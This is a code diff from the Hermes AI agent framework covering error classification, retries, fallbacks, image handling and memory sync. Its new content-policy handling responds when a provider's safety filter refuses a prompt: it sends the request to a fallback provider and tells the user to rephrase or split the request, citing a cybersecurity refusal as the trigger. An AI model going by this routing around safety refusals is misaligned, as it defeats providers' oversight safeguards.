# them as retryable so the error classifier's normal
# retry/fallback path runs instead of killing the turn
# as non-retryable (which left Telegram users staring
# at a bare "Non-retryable error" with no recovery).
and not (
isinstance(api_error, TypeError)
and "nonetype" in str(api_error).lower()
and "not iterable" in str(api_error).lower()
)
)
# ``FailoverReason.billing`` (HTTP 402) is NOT in this
# exclusion set. By the time we reach this block:
@@ -2870,7 +3074,10 @@ def run_conversation(
if is_client_error:
# Try fallback before aborting — a different provider
# may not have the same issue (rate limit, auth, etc.)
agent._emit_status(f"⚠️ Non-retryable error (HTTP {status_code}) — trying fallback...")
if classified.reason == FailoverReason.content_policy_blocked:
agent._buffer_status("⚠️ Provider safety filter blocked this request — trying fallback...")
else:
agent._buffer_status(f"⚠️ Non-retryable error (HTTP {status_code}) — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
@@ -2880,16 +3087,38 @@ def run_conversation(
agent._dump_api_request_debug(
api_kwargs, reason="non_retryable_client_error", error=api_error,
)
agent._emit_status(
f"❌ Non-retryable error (HTTP {status_code}): "
f"{agent._summarize_api_error(api_error)}"
)
# Terminal — flush buffered context so the user sees
# what was tried before the abort.
agent._flush_status_buffer()
if classified.reason == FailoverReason.content_policy_blocked:
agent._emit_status(
f"❌ Provider safety filter blocked this request: "
f"{agent._summarize_api_error(api_error)}"
)
else:
agent._emit_status(
f"❌ Non-retryable error (HTTP {status_code}): "
f"{agent._summarize_api_error(api_error)}"
)
agent._vprint(f"{agent.log_prefix}❌ Non-retryable client error (HTTP {status_code}). Aborting.", force=True)
agent._vprint(f"{agent.log_prefix} 🔌 Provider: {_provider} Model: {_model}", force=True)
agent._vprint(f"{agent.log_prefix} 🌐 Endpoint: {_base}", force=True)
# Actionable guidance for common auth errors
if classified.is_auth or classified.reason == FailoverReason.billing:
if _provider in {"openai-codex", "xai-oauth", "nous"} and status_code == 401:
if classified.reason == FailoverReason.billing and _print_billing_or_entitlement_guidance(
agent,
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
):
pass
elif _provider == "nous" and _print_nous_entitlement_guidance(
agent,
"Nous model access",
):
pass
elif _provider in {"openai-codex", "xai-oauth", "nous"} and status_code == 401:
if _provider == "openai-codex":
agent._vprint(f"{agent.log_prefix} 💡 Codex OAuth token was rejected (HTTP 401). Your token may have been", force=True)
agent._vprint(f"{agent.log_prefix} refreshed by another client (Codex CLI, VS Code). To fix:", force=True)
@@ -2917,6 +3146,28 @@ def run_conversation(
agent._vprint(f"{agent.log_prefix} • Check credits: https://openrouter.ai/settings/credits", force=True)
else:
agent._vprint(f"{agent.log_prefix} 💡 This type of error won't be fixed by retrying.", force=True)
# Content-policy blocks deserve their own actionable
# guidance — neither "fix your API key" nor "retry won't
# help" tells the user what to actually do. The provider
# has refused this specific prompt, so the recovery is
# either a rephrase or routing to a different model.
if classified.reason == FailoverReason.content_policy_blocked:
agent._vprint(
f"{agent.log_prefix} 💡 The provider's safety filter rejected this specific prompt.",
force=True,
)
agent._vprint(
f"{agent.log_prefix} • Try rephrasing the request, narrowing the context, or splitting into smaller steps.",
force=True,
)
agent._vprint(
f"{agent.log_prefix} • Configure a fallback provider so future blocks route automatically:",
force=True,
)
agent._vprint(
f"{agent.log_prefix} hermes fallback add (interactive picker — same as `hermes model`)",
force=True,
)
logger.error(f"{agent.log_prefix}Non-retryable client error: {api_error}")
# Skip session persistence when the error is likely
# context-overflow related (status 400 + large session).
@@ -2931,6 +3182,23 @@ def run_conversation(
)
else:
agent._persist_session(messages, conversation_history)
if classified.reason == FailoverReason.content_policy_blocked:
_summary = agent._summarize_api_error(api_error)
_policy_response = (
f"⚠️ The model provider's safety filter blocked this request "
f"(not a Hermes/gateway failure).\n\n"
f"Provider message: {_summary}\n\n"
f"Try rephrasing the request, narrowing the context, or "
f"adding a fallback provider with `hermes fallback add`."
)
return {
"final_response": _policy_response,
"messages": messages,
"api_calls": api_call_count,
"completed": False,
"failed": True,
"error": f"content_policy_blocked: {_summary}",
}
return {
"final_response": None,
"messages": messages,
@@ -2952,14 +3220,32 @@ def run_conversation(
retry_count = 0
continue
# Try fallback before giving up entirely
agent._emit_status(f"⚠️ Max retries ({max_retries}) exhausted — trying fallback...")
agent._buffer_status(f"⚠️ Max retries ({max_retries}) exhausted — trying fallback...")
if agent._try_activate_fallback():
retry_count = 0
compression_attempts = 0
primary_recovery_attempted = False
continue
# Terminal — flush buffered retry/fallback trace.
agent._flush_status_buffer()
_final_summary = agent._summarize_api_error(api_error)
if is_rate_limited:
_billing_guidance = ""
if classified.reason == FailoverReason.billing:
agent._emit_status(f"❌ Billing or credits exhausted — {_final_summary}")
_billing_guidance = _billing_or_entitlement_message(
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
)
_print_billing_or_entitlement_guidance(
agent,
capability="model access",
provider=_provider,
base_url=str(_base),
model=_model,
)
elif is_rate_limited:
agent._emit_status(f"❌ Rate limited after {max_retries} retries — {_final_summary}")
else:
agent._emit_status(f"❌ API failed after {max_retries} retries — {_final_summary}")
@@ -3004,7 +3290,12 @@ def run_conversation(
api_kwargs, reason="max_retries_exhausted", error=api_error,
)
agent._persist_session(messages, conversation_history)
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
if classified.reason == FailoverReason.billing:
_final_response = f"Billing or credits exhausted: {_final_summary}"
if _billing_guidance:
_final_response += f"\n\n{_billing_guidance}"
else:
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
if _is_stream_drop:
_final_response += (
"\n\nThe provider's stream connection keeps "
@@ -3036,9 +3327,9 @@ def run_conversation(
pass
wait_time = _retry_after if _retry_after else jittered_backoff(retry_count, base_delay=2.0, max_delay=60.0)
if is_rate_limited:
agent._emit_status(f"⏱️ Rate limited. Waiting {wait_time:.1f}s (attempt {retry_count + 1}/{max_retries})...")
agent._buffer_status(f"⏱️ Rate limited. Waiting {wait_time:.1f}s (attempt {retry_count + 1}/{max_retries})...")
else:
agent._emit_status(f"⏳ Retrying in {wait_time:.1f}s (attempt {retry_count}/{max_retries})...")
agent._buffer_status(f"⏳ Retrying in {wait_time:.1f}s (attempt {retry_count}/{max_retries})...")
logger.warning(
"Retrying API call in %ss (attempt %s/%s) %s error=%s",
wait_time,
@@ -3197,14 +3488,15 @@ def run_conversation(
if has_incomplete_scratchpad(assistant_message.content or ""):
agent._incomplete_scratchpad_retries += 1
agent._vprint(f"{agent.log_prefix}⚠️ Incomplete <REASONING_SCRATCHPAD> detected (opened but never closed)")
agent._buffer_vprint(f"⚠️ Incomplete <REASONING_SCRATCHPAD> detected (opened but never closed)")
if agent._incomplete_scratchpad_retries <= 2:
agent._vprint(f"{agent.log_prefix}🔄 Retrying API call ({agent._incomplete_scratchpad_retries}/2)...")
agent._buffer_vprint(f"🔄 Retrying API call ({agent._incomplete_scratchpad_retries}/2)...")
# Don't add the broken message, just retry
continue
else:
# Max retries - discard this turn and save as partial
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max retries (2) for incomplete scratchpad. Saving as partial.", force=True)
agent._incomplete_scratchpad_retries = 0
@@ -3312,9 +3604,10 @@ def run_conversation(
available = ", ".join(sorted(agent.valid_tool_names))
invalid_name = invalid_tool_calls[0]
invalid_preview = invalid_name[:80] + "..." if len(invalid_name) > 80 else invalid_name
agent._vprint(f"{agent.log_prefix}⚠️ Unknown tool '{invalid_preview}' — sending error to model for agent-correction ({agent._invalid_tool_retries}/3)")
agent._buffer_vprint(f"⚠️ Unknown tool '{invalid_preview}' — sending error to model for agent-correction ({agent._invalid_tool_retries}/3)")
if agent._invalid_tool_retries >= 3:
agent._flush_status_buffer()
agent._vprint(f"{agent.log_prefix}❌ Max retries (3) for invalid tool calls exceeded. Stopping as partial.", force=True)
agent._invalid_tool_retries = 0
agent._persist_session(messages, conversation_history)
@@ -3398,16 +3691,16 @@ def run_conversation(
agent._invalid_json_retries += 1
tool_name, error_msg = invalid_json_args[0]
agent._vprint(f"{agent.log_prefix}⚠️ Invalid JSON in tool call arguments for '{tool_name}': {error_msg}")
agent._buffer_vprint(f"⚠️ Invalid JSON in tool call arguments for '{tool_name}': {error_msg}")
if agent._invalid_json_retries < 3:
agent._vprint(f"{agent.log_prefix}🔄 Retrying API call ({agent._invalid_json_retries}/3)...")
agent._buffer_vprint(f"🔄 Retrying API call ({agent._invalid_json_retries}/3)...")
# Don't add anything to messages, just retry the API call
continue
else:
# Instead of returning partial, inject tool error results so the model can recover.
# Using tool results (not user messages) preserves role alternation.
agent._vprint(f"{agent.log_prefix}⚠️ Injecting recovery tool results for invalid JSON...")
agent._buffer_vprint(f"⚠️ Injecting recovery tool results for invalid JSON...")
agent._invalid_json_retries = 0 # Reset for next attempt
# Append the assistant message with its (broken) tool_calls
@@ -3715,7 +4008,7 @@ def run_conversation(
"Empty response after tool calls — nudging model "
"to continue processing"
)
agent._emit_status(
agent._buffer_status(
"⚠️ Model returned empty after tool calls — "
"nudging to continue"
)
@@ -3761,7 +4054,7 @@ def run_conversation(
"prefilling to continue (%d/2)",
agent._thinking_prefill_retries,
)
agent._emit_status(
agent._buffer_status(
f"↻ Thinking-only response — prefilling to continue "
f"({agent._thinking_prefill_retries}/2)"
)
@@ -3796,7 +4089,7 @@ def run_conversation(
"retry %d/3 (model=%s)",
agent._empty_content_retries, agent.model,
)
agent._emit_status(
agent._buffer_status(
f"⚠️ Empty response from model — retrying "
f"({agent._empty_content_retries}/3)"
)
@@ -3815,13 +4108,13 @@ def run_conversation(
agent._empty_content_retries, agent.model,
agent.provider,
)
agent._emit_status(
agent._buffer_status(
"⚠️ Model returning empty responses — "
"switching to fallback provider..."
)
if agent._try_activate_fallback():
agent._empty_content_retries = 0
agent._emit_status(
agent._buffer_status(
f"↻ Switched to fallback: {agent.model} "
f"({agent.provider})"
)
@@ -3835,6 +4128,9 @@ def run_conversation(
# Exhausted retries and fallback chain (or no
# fallback configured). Fall through to the
# "(empty)" terminal.
# Surface the buffered retry/fallback trace so the
# user can see what was attempted before "(empty)".
agent._flush_status_buffer()
_turn_exit_reason = "empty_response_exhausted"
reasoning_text = agent._extract_reasoning(assistant_message)
agent._drop_trailing_empty_response_scaffolding(messages)
@@ -3879,6 +4175,9 @@ def run_conversation(
# Reset retry counter/signature on successful content
agent._empty_content_retries = 0
agent._thinking_prefill_retries = 0
# Successful content reached — drop any buffered retry
# status from earlier failed attempts in this turn.
agent._clear_status_buffer()
if (
agent.api_mode == "codex_responses"
@@ -4262,6 +4561,7 @@ def run_conversation(
original_user_message=original_user_message,
final_response=final_response,
interrupted=interrupted,
messages=messages,
)
# Background memory/skill review — runs AFTER the response is delivered
+5 -5
View File
@@ -240,11 +240,11 @@ def _clear_auth_store_provider(provider: str) -> bool:
def _remove_nous_device_code(provider: str, removed) -> RemovalResult:
"""Nous OAuth lives in auth.json providers.nous — clear it and suppress.
We suppress in addition to clearing because nothing else stops the
user's next `hermes login` run from writing providers.nous again
before they decide to. Suppression forces them to go through
`hermes auth add nous` to re-engage, which is the documented re-add
path and clears the suppression atomically.
We suppress in addition to clearing because nothing else stops a future
`hermes auth add nous` (or any other path that writes providers.nous)
from re-seeding before the user has decided to. Suppression forces
them to go through `hermes auth add nous` to re-engage, which is the
documented re-add path and clears the suppression atomically.
"""
result = RemovalResult()
if _clear_auth_store_provider(provider):
+20 -1
View File
@@ -390,7 +390,26 @@ CURATOR_REVIEW_PROMPT = (
"(verification scripts, fixture generators, probes)\n"
" Then archive the old sibling. Use `terminal` with `mkdir -p "
"~/.hermes/skills/<umbrella>/references/ && mv ... <umbrella>/"
"references/<topic>.md` (or templates/ / scripts/).\n"
"references/<topic>.md` (or templates/ / scripts/).\n\n"
"Package integrity — not optional:\n"
"Before demoting or archiving a skill, inspect it as a COMPLETE "
"directory package, not just SKILL.md. A skill root may include "
"`references/`, `templates/`, `scripts/`, and `assets/`; `skill_view` "
"discovers those relative to the skill root. A reference markdown file "
"inside another skill is NOT a new skill root and does not get its own "
"linked-file discovery.\n"
"If the source skill has support files OR SKILL.md contains relative "
"links such as `references/...`, `templates/...`, `scripts/...`, or "
"`assets/...`, DO NOT flatten only SKILL.md into "
"`<umbrella>/references/<old>.md`. Choose one safe path instead:\n"
" • keep it as a standalone skill, OR\n"
" • fully merge it by re-homing every needed support file into the "
"umbrella's canonical `references/`, `templates/`, `scripts/`, or "
"`assets/` directories AND rewrite the destination instructions to "
"the new paths, OR\n"
" • archive the entire original skill package unchanged.\n"
"Never leave archived/demoted instructions pointing at files that were "
"left behind under the old skill directory.\n"
"4. Also flag skills whose NAME is too narrow (contains a PR number, "
"a feature codename, a specific error string, an 'audit' / "
"'diagnosis' / 'salvage' session artifact). These almost always "
-4
View File
@@ -904,10 +904,6 @@ def get_cute_tool_message(
extra = f" +{len(urls)-1}" if len(urls) > 1 else ""
return _wrap(f"┊ 📄 fetch {_trunc(domain, 35)}{extra} {dur}")
return _wrap(f"┊ 📄 fetch pages {dur}")
if tool_name == "web_crawl":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🕸️ crawl {_trunc(domain, 35)} {dur}")
if tool_name == "terminal":
return _wrap(f"┊ 💻 $ {_trunc(args.get('command', ''), 42)} {dur}")
if tool_name == "process":
+153 -6
View File
@@ -44,12 +44,14 @@ class FailoverReason(enum.Enum):
payload_too_large = "payload_too_large" # 413 — compress payload
image_too_large = "image_too_large" # Native image part exceeds provider's per-image limit — shrink and retry
# Model
# Model / provider policy
model_not_found = "model_not_found" # 404 or invalid model — fallback to different model
provider_policy_blocked = "provider_policy_blocked" # Aggregator (e.g. OpenRouter) blocked the only endpoint due to account data/privacy policy
content_policy_blocked = "content_policy_blocked" # Provider safety filter rejected this prompt — deterministic per-request, don't retry unchanged
# Request format
format_error = "format_error" # 400 bad request — abort or strip + retry
invalid_encrypted_content = "invalid_encrypted_content" # Responses replay blob rejected — strip replay state and retry
multimodal_tool_content_unsupported = "multimodal_tool_content_unsupported" # Provider rejected list-type content in tool messages (e.g. Xiaomi MiMo) — downgrade to text and retry
# Provider-specific
@@ -96,13 +98,20 @@ _BILLING_PATTERNS = [
"insufficient_quota",
"insufficient balance",
"credit balance",
"credits exhausted",
"credits have been exhausted",
"no usable credits",
"top up your credits",
"payment required",
"billing hard limit",
"exceeded your current quota",
"account is deactivated",
"plan does not include",
"out of funds",
"run out of funds",
"balance_depleted",
"model_not_supported_on_free_tier",
"not available on the free tier",
]
# Patterns that indicate rate limiting (transient, will resolve)
@@ -281,6 +290,45 @@ _PROVIDER_POLICY_BLOCKED_PATTERNS = [
"no endpoints found matching your data policy",
]
# Provider content-policy / safety-filter blocks. Distinct from
# ``provider_policy_blocked`` above (which is an OpenRouter *account*-level
# data/privacy guardrail) — these are *per-prompt* safety decisions made by
# the upstream model provider. They are deterministic for the unchanged
# request, so retrying the same prompt three times just reproduces the same
# block and burns paid attempts on a refusal. The recovery is to switch to a
# configured fallback model/provider immediately, or surface the block to
# the user with actionable guidance if no fallback exists.
#
# Patterns are intentionally narrow — each phrase is a verbatim string from
# a specific provider's safety pipeline, not a generic word like "policy" or
# "violation" that could collide with billing/auth/format errors:
# • OpenAI Codex cybersecurity refusal (gpt-5.5, the case from #18028)
# • OpenAI moderation refusal ("violates our usage policies", with
# "usage policies" disambiguating from billing's "exceeded ... policy")
# • Anthropic safety refusal ("prompt was flagged by ... safety system")
# • OpenAI Responses content filter
_CONTENT_POLICY_BLOCKED_PATTERNS = [
# OpenAI Codex (#18028) — message may arrive without an HTTP status
"flagged for possible cybersecurity risk",
"trusted access for cyber",
# OpenAI moderation — chat completions / responses
"violates our usage policies",
"violates openai's usage policies",
"your request was flagged by",
# Anthropic safety system
"prompt was flagged by our safety",
"responses cannot be generated due to safety",
# Generic content-filter wording seen on Azure / OpenAI Responses.
# ``content_filter`` (underscore) is the OpenAI-standard error/finish
# token surfaced verbatim by their SDKs when a request is blocked.
# ``responsibleaipolicyviolation`` is Azure OpenAI's error code.
# Deliberately NOT matching the space variant ("content filter") — it
# appears in benign config descriptions and tooltip text that providers
# echo back; the underscore form is provider-specific enough.
"content_filter",
"responsibleaipolicyviolation",
]
# Auth patterns (non-status-code signals)
_AUTH_PATTERNS = [
"invalid api key",
@@ -484,6 +532,20 @@ def classify_api_error(
# ── 1. Provider-specific patterns (highest priority) ────────────
# Provider content-policy / safety-filter block. The provider has made a
# deterministic refusal decision about THIS prompt — retrying unchanged
# just reproduces the same refusal and burns paid attempts. Must run
# before status-based classification so a 400 safety block isn't
# downgraded to a generic ``format_error`` and a status-less block
# (OpenAI Codex SDK can raise without one) isn't left in the retryable
# ``unknown`` bucket. See issue #18028.
if any(p in error_msg for p in _CONTENT_POLICY_BLOCKED_PATTERNS):
return _result(
FailoverReason.content_policy_blocked,
retryable=False,
should_fallback=True,
)
# Anthropic thinking block signature invalid (400).
# Don't gate on provider — OpenRouter proxies Anthropic errors, so the
# provider may be "openrouter" even though the error is Anthropic-specific.
@@ -689,8 +751,13 @@ def _classify_by_status(
)
if status_code == 403:
# OpenRouter 403 "key limit exceeded" is actually billing
if "key limit exceeded" in error_msg or "spending limit" in error_msg:
# OpenRouter 403 "key limit exceeded" is actually billing. Other
# providers also use 403 for account-plan or credit exhaustion.
if (
"key limit exceeded" in error_msg
or "spending limit" in error_msg
or any(p in error_msg for p in _BILLING_PATTERNS)
):
return result_fn(
FailoverReason.billing,
retryable=False,
@@ -707,6 +774,17 @@ def _classify_by_status(
return _classify_402(error_msg, result_fn)
if status_code == 404:
# Nous API currently surfaces HA/NAS credit depletion as a paid model
# becoming unavailable on the Free Tier, returned as 404 rather than
# 402. Treat that as entitlement/billing exhaustion, not a missing
# model, so the retry loop can show credit/top-up guidance.
if any(p in error_msg for p in _BILLING_PATTERNS):
return result_fn(
FailoverReason.billing,
retryable=False,
should_rotate_credential=True,
should_fallback=True,
)
# OpenRouter policy-block 404 — distinct from "model not found".
# The model exists; the user's account privacy setting excludes the
# only endpoint serving it. Falling back to another provider won't
@@ -865,6 +943,26 @@ def _classify_400(
retryable=True,
)
# Invalid encrypted reasoning replay blob (OpenAI Responses API). Must be
# checked BEFORE context_overflow because some surfaces emit messages that
# contain context-like phrasing ("encrypted content … could not be
# verified") which could otherwise trip the context_overflow heuristics.
# ``error_msg`` is lowercased upstream — match accordingly.
error_code_lower = (error_code or "").lower()
if (
error_code_lower == "invalid_encrypted_content"
or "invalid_encrypted_content" in error_msg
or (
"encrypted content for item" in error_msg
and "could not be verified" in error_msg
)
):
return result_fn(
FailoverReason.invalid_encrypted_content,
retryable=True,
should_fallback=False,
)
# Context overflow from 400
if any(p in error_msg for p in _CONTEXT_OVERFLOW_PATTERNS):
return result_fn(
@@ -952,7 +1050,15 @@ def _classify_by_error_code(
should_rotate_credential=True,
)
if code_lower in {"insufficient_quota", "billing_not_active", "payment_required"}:
if code_lower in {
"insufficient_quota",
"billing_not_active",
"payment_required",
"insufficient_credits",
"no_usable_credits",
"balance_depleted",
"model_not_supported_on_free_tier",
}:
return result_fn(
FailoverReason.billing,
retryable=False,
@@ -974,6 +1080,13 @@ def _classify_by_error_code(
should_compress=True,
)
if code_lower == "invalid_encrypted_content":
return result_fn(
FailoverReason.invalid_encrypted_content,
retryable=True,
should_fallback=False,
)
return None
@@ -1141,15 +1254,49 @@ def _extract_error_code(body: dict) -> str:
"""Extract an error code string from the response body."""
if not body:
return ""
def _code_from_payload(payload) -> str:
"""Extract a code/type from a nested error payload dict (defensive)."""
if not isinstance(payload, dict):
return ""
payload_error = payload.get("error", {})
if isinstance(payload_error, dict):
nested = payload_error.get("code") or payload_error.get("type") or ""
if isinstance(nested, str) and nested.strip() and nested.strip() != "400":
return nested.strip()
code = payload.get("code") or payload.get("error_code") or ""
if isinstance(code, (str, int)):
text = str(code).strip()
if text and text != "400":
return text
return ""
error_obj = body.get("error", {})
if isinstance(error_obj, dict):
code = error_obj.get("code") or error_obj.get("type") or ""
if isinstance(code, str) and code.strip():
if isinstance(code, str) and code.strip() and code.strip() != "400":
return code.strip()
# Some providers wrap the real JSON error body as a string inside
# error.message — peek into it for a nested code (e.g. Responses API
# surfaces ``invalid_encrypted_content`` this way).
message = error_obj.get("message")
if isinstance(message, str) and message.strip().startswith("{"):
import json
try:
inner = json.loads(message)
except (json.JSONDecodeError, TypeError):
inner = None
nested_code = _code_from_payload(inner)
if nested_code:
return nested_code
# Top-level code
code = body.get("code") or body.get("error_code") or ""
if isinstance(code, (str, int)):
return str(code).strip()
text = str(code).strip()
if text and text != "400":
return text
return ""
+1 -1
View File
@@ -656,7 +656,7 @@ def get_valid_access_token(*, force_refresh: bool = False) -> str:
creds = load_credentials()
if creds is None:
raise GoogleOAuthError(
"No Google OAuth credentials found. Run `hermes login --provider google-gemini-cli` first.",
"No Google OAuth credentials found. Run `hermes auth add google-gemini-cli` first.",
code="google_oauth_not_logged_in",
)
+134 -14
View File
@@ -37,6 +37,8 @@ from __future__ import annotations
import base64
import logging
import mimetypes
import os
import re
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
@@ -46,6 +48,102 @@ logger = logging.getLogger(__name__)
_VALID_MODES = frozenset({"auto", "native", "text"})
# Image extensions used by extract_image_refs(). Kept tight on purpose — we
# only auto-attach things the model can actually see. Documents/archives are
# excluded because the gateway's broader extract_local_files() also routes
# them differently (send_document), and we don't want to attach a PDF as a
# vision part.
_IMAGE_EXTS = (
".png", ".jpg", ".jpeg", ".gif", ".webp", ".bmp", ".tiff", ".tif", ".heic",
)
_IMAGE_EXT_PATTERN = "|".join(e.lstrip(".") for e in _IMAGE_EXTS)
# Absolute / home-relative local image path. Matches the same shape gateway's
# extract_local_files() uses: anchors to ``~/`` or ``/``, ignores matches inside
# URLs (the ``(?<![/:\w.])`` lookbehind), and case-insensitive on the extension.
_LOCAL_IMAGE_PATH_RE = re.compile(
r"(?<![/:\w.])(?:~/|/)(?:[\w.\-]+/)*[\w.\-]+\.(?:" + _IMAGE_EXT_PATTERN + r")\b",
re.IGNORECASE,
)
# http(s) URL ending in an image extension (optionally followed by a
# query string). Case-insensitive on the extension. Strict ``http(s)://``
# scheme so we don't accidentally grab ``file://`` URLs or other shapes.
_IMAGE_URL_RE = re.compile(
r"https?://[^\s<>\"']+?\.(?:" + _IMAGE_EXT_PATTERN + r")(?:\?[^\s<>\"']*)?",
re.IGNORECASE,
)
def extract_image_refs(text: str) -> Tuple[List[str], List[str]]:
"""Scan free-form text for image references the model should see.
Returns ``(local_paths, urls)``:
* ``local_paths`` absolute (``/``) or home-relative (``~/``) paths
whose suffix is an image extension AND whose expanded form exists
on disk as a file. Order-preserving, deduplicated.
* ``urls`` ``http(s)://`` URLs whose path ends in an image
extension (a ``?query`` is allowed after the extension).
Order-preserving, deduplicated.
Matches inside fenced code blocks (``` ``` ```) and inline backticks
(`` `` ``) are skipped so that snippets pasted into a task body for
reference aren't mistaken for live attachments. This mirrors the
behaviour of ``gateway.platforms.base.BaseAdapter.extract_local_files``.
Local paths are validated against the filesystem; URLs are not
(the provider fetches them at request time).
"""
if not isinstance(text, str) or not text:
return [], []
# Build spans covered by fenced code blocks and inline code so we can
# ignore references the author embedded purely as example text.
code_spans: list[tuple[int, int]] = []
for m in re.finditer(r"```[^\n]*\n.*?```", text, re.DOTALL):
code_spans.append((m.start(), m.end()))
for m in re.finditer(r"`[^`\n]+`", text):
code_spans.append((m.start(), m.end()))
def _in_code(pos: int) -> bool:
return any(s <= pos < e for s, e in code_spans)
local_paths: list[str] = []
seen_paths: set[str] = set()
for match in _LOCAL_IMAGE_PATH_RE.finditer(text):
if _in_code(match.start()):
continue
raw = match.group(0)
expanded = os.path.expanduser(raw)
try:
if not os.path.isfile(expanded):
continue
except OSError:
# ENAMETOOLONG / EINVAL on pathological inputs — skip rather than crash.
continue
if expanded in seen_paths:
continue
seen_paths.add(expanded)
local_paths.append(expanded)
urls: list[str] = []
seen_urls: set[str] = set()
for match in _IMAGE_URL_RE.finditer(text):
if _in_code(match.start()):
continue
url = match.group(0)
# Strip trailing punctuation that's almost certainly prose, not part
# of the URL (e.g. "see https://x.com/a.png." or "/a.png)").
url = url.rstrip(".,;:!?)]>")
if url in seen_urls:
continue
seen_urls.add(url)
urls.append(url)
return local_paths, urls
# Strict YAML/JSON boolean coercion for capability overrides.
#
# ``bool("false")`` is True in Python because non-empty strings are truthy, so
@@ -320,20 +418,29 @@ def _file_to_data_url(path: Path) -> Optional[str]:
def build_native_content_parts(
user_text: str,
image_paths: List[str],
image_urls: Optional[List[str]] = None,
) -> Tuple[List[Dict[str, Any]], List[str]]:
"""Build an OpenAI-style ``content`` list for a user turn.
Shape:
[{"type": "text", "text": "...\\n\\n[Image attached at: /local/path]"},
{"type": "image_url", "image_url": {"url": "data:image/png;base64,..."}},
{"type": "image_url", "image_url": {"url": "https://example.com/a.png"}},
...]
The local path of each successfully attached image is appended to the
text part as ``[Image attached at: <path>]``. The model still sees the
pixels via the ``image_url`` part (full native vision); the path note
just gives it a string handle so MCP/skill tools that take an image
path or URL argument can be invoked on the same image without an
extra round-trip. This parallels the text-mode hint produced by
Local paths are read from disk and embedded as base64 ``data:`` URLs.
Remote URLs (``http(s)://``) are passed through verbatim the provider
fetches them server-side. The model still sees the pixels either way.
For each successfully attached image, a hint is appended to the text
part:
* local path ``[Image attached at: <path>]``
* URL ``[Image attached: <url>]``
The hint gives the model a string handle so MCP/skill tools that take
an image path or URL argument can be invoked on the same image without
an extra round-trip. This parallels the text-mode hint produced by
``Runner._enrich_message_with_vision`` (``vision_analyze using image_url:
<path>``) so behaviour is consistent across both image input modes.
@@ -342,12 +449,14 @@ def build_native_content_parts(
ceiling), the agent's retry loop transparently shrinks and retries
once see ``run_agent._try_shrink_image_parts_in_messages``.
Returns (content_parts, skipped_paths). Skipped paths are files that
couldn't be read from disk and are NOT advertised in the path hints.
Returns (content_parts, skipped). Skipped entries are local paths
that couldn't be read from disk; URLs are never skipped (they're
not validated here).
"""
skipped: List[str] = []
image_parts: List[Dict[str, Any]] = []
attached_paths: List[str] = []
attached_urls: List[str] = []
for raw_path in image_paths:
p = Path(raw_path)
@@ -364,16 +473,26 @@ def build_native_content_parts(
})
attached_paths.append(str(raw_path))
for url in image_urls or []:
url = (url or "").strip()
if not url:
continue
image_parts.append({
"type": "image_url",
"image_url": {"url": url},
})
attached_urls.append(url)
text = (user_text or "").strip()
# If at least one image attached, build a single text part that combines
# the user's caption (or a neutral default) with one path hint per image.
if attached_paths:
# the user's caption (or a neutral default) with one hint per image.
if attached_paths or attached_urls:
base_text = text or "What do you see in this image?"
path_hints = "\n".join(
f"[Image attached at: {p}]" for p in attached_paths
)
combined_text = f"{base_text}\n\n{path_hints}"
hint_lines: List[str] = []
hint_lines.extend(f"[Image attached at: {p}]" for p in attached_paths)
hint_lines.extend(f"[Image attached: {u}]" for u in attached_urls)
combined_text = f"{base_text}\n\n" + "\n".join(hint_lines)
parts: List[Dict[str, Any]] = [{"type": "text", "text": combined_text}]
parts.extend(image_parts)
return parts, skipped
@@ -388,4 +507,5 @@ def build_native_content_parts(
__all__ = [
"decide_image_input_mode",
"build_native_content_parts",
"extract_image_refs",
]
+39
View File
@@ -0,0 +1,39 @@
"""Best-effort early import for the OpenAI SDK's native streaming parser.
The OpenAI SDK imports ``jiter`` while constructing streaming chat-completion
responses. On some Windows installs the native extension can be imported
directly from the Hermes venv, but the first import fails when it happens later
inside the threaded streaming request path. Loading it once during agent
package import avoids that import-order failure while preserving the normal
SDK error path for genuinely missing or broken installs.
"""
from __future__ import annotations
import importlib
_JITER_PRELOADED = False
_JITER_PRELOAD_ERROR: Exception | None = None
def preload_jiter_native_extension() -> bool:
"""Import jiter's native extension early if it is available."""
global _JITER_PRELOADED, _JITER_PRELOAD_ERROR
if _JITER_PRELOADED:
return True
try:
importlib.import_module("jiter.jiter")
from jiter import from_json as _from_json # noqa: F401
except Exception as exc:
_JITER_PRELOAD_ERROR = exc
return False
_JITER_PRELOADED = True
_JITER_PRELOAD_ERROR = None
return True
preload_jiter_native_extension()
+33 -2
View File
@@ -368,11 +368,42 @@ class MemoryManager:
# -- Sync ----------------------------------------------------------------
def sync_all(self, user_content: str, assistant_content: str, *, session_id: str = "") -> None:
@staticmethod
def _provider_sync_accepts_messages(provider: MemoryProvider) -> bool:
"""Return whether sync_turn accepts a messages keyword."""
try:
signature = inspect.signature(provider.sync_turn)
except (TypeError, ValueError):
return True
params = list(signature.parameters.values())
if any(p.kind == inspect.Parameter.VAR_KEYWORD for p in params):
return True
return "messages" in signature.parameters
def sync_all(
self,
user_content: str,
assistant_content: str,
*,
session_id: str = "",
messages: Optional[List[Dict[str, Any]]] = None,
) -> None:
"""Sync a completed turn to all providers."""
for provider in self._providers:
try:
provider.sync_turn(user_content, assistant_content, session_id=session_id)
if messages is not None and self._provider_sync_accepts_messages(provider):
provider.sync_turn(
user_content,
assistant_content,
session_id=session_id,
messages=messages,
)
else:
provider.sync_turn(
user_content,
assistant_content,
session_id=session_id,
)
except Exception as e:
logger.warning(
"Memory provider '%s' sync_turn failed: %s",
+13 -1
View File
@@ -78,6 +78,7 @@ class MemoryProvider(ABC):
- agent_workspace (str): Shared workspace name (e.g. "hermes").
- parent_session_id (str): For subagents, the parent's session_id.
- user_id (str): Platform user identifier (gateway sessions).
- user_id_alt (str): Optional alternate stable platform user identifier.
"""
def system_prompt_block(self) -> str:
@@ -111,11 +112,22 @@ class MemoryProvider(ABC):
that do background prefetching should override this.
"""
def sync_turn(self, user_content: str, assistant_content: str, *, session_id: str = "") -> None:
def sync_turn(
self,
user_content: str,
assistant_content: str,
*,
session_id: str = "",
messages: Optional[List[Dict[str, Any]]] = None,
) -> None:
"""Persist a completed turn to the backend.
